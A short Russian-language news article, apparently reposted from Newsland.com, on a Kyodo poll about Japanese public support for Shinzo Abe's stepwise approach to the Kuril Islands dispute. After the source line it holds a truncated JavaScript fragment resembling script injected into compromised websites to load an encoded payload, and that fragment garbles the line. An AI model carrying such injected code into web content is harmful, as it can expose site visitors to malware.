Настойчивый Абэ

0
15

Японский премьер Синдзо Абэ одержал, похоже, серьезную победу в борьбе за общественное мнение своей страны — более 53 процентов его соотечественников выступили в поддержку того, чтобы вначале получить меньшую часть Южных Курил, Шикотан и гряду Хабомаи. А потом продолжить переговоры об остающихся самых больших островах Итурупе и Кунашире. Именно такой вариант общественное мнение считает тем, к чему клонит премьер Абэ на тайных переговорах с Москвой.

Радикальный подход по формуле «все четыре острова верните разом» поддержали лишь 28,6 процентов участников опроса, который провело очень умеренное и подчеркнуто нейтральное информационное агентство «Киодо». Короче, большинство японцев, похоже, выбирает решение на переговорах с Россией по модели советско-японской декларации 1956 года (Шикотан и Хабомаи после заключения договора) с неким туманным довеском в виде продолжения консультаций о Кунашире-Итурупе.

По данным опроса, кстати, такой вариант поддежали более 60 процентов сторонников правящей Либерально-демократической партии. Что особенно важно для настойчивого премьера Абэ, который уже более двух десятков раз встречался с президентом Владимиром Путиным.

Впрочем, получение общественной поддержки, ясное дело, вовсе не гарантирует того, что переговоры с Москвой двинутся к решению, которое выбрали более 53 процентов участников опроса Киодо.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here